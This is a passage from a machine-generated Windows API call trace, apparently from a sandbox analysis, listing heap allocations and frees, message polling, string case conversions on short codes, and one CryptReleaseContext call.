hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0100.574] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0100.574] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0100.574] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0100.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0100.574] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0100.575] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0100.575] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0100.575] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0100.575] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0100.575] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0100.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0100.576] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0100.576] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0100.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0100.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743e8 [0100.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0100.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0100.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0100.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0100.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743e8 | out: hHeap=0x2af0000) returned 1 [0100.578] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.578] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0100.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0100.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0100.579] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.579] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.579] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.579] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.579] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.579] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0100.579] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.579] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.580] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.580] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.580] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.580] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0100.580] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.580] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0100.580] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.580] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0100.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0100.581] CryptReleaseContext (hProv=0x9bf088, dwFlags=0x0) returned 1 [0100.581] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.581] CharUpperBuffW (in: 